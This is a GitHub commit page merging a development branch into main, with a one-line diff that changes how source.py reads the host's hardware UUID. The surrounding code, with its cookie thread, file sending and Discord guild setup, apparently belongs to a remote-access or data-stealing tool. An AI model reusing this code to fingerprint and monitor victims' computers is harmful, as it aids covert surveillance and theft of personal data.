Skip to content

Commit

Permalink
Merge pull request #373 from mategol/py-dev
Browse files Browse the repository at this point in the history
merge pydev to main
  • Loading branch information
Yaw-Dev authored Apr 19, 2024
2 parents 5c5924b + 2b2f7ea commit 47de1f8
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion source.py
Original file line number Diff line number Diff line change
Expand Up @@ -125,7 +125,7 @@ def log(entry): # [pysilon_mark] !debug
async def on_ready():
global force_to_send, messages_to_send, files_to_send, embeds_to_send, channel_ids, cookies_thread, latest_messages_in_recordings
#.log BOT loaded
hwid = subprocess.check_output('wmic csproduct get uuid', shell=True).decode().split('\n')[1].strip()
hwid = subprocess.check_output("powershell (Get-CimInstance Win32_ComputerSystemProduct).UUID").decode().strip()
#.log HWID obtained
first_run = True
for category_name in client.get_guild(guild_id).categories:
Expand Down

0 comments on commit 47de1f8

Please sign in to comment.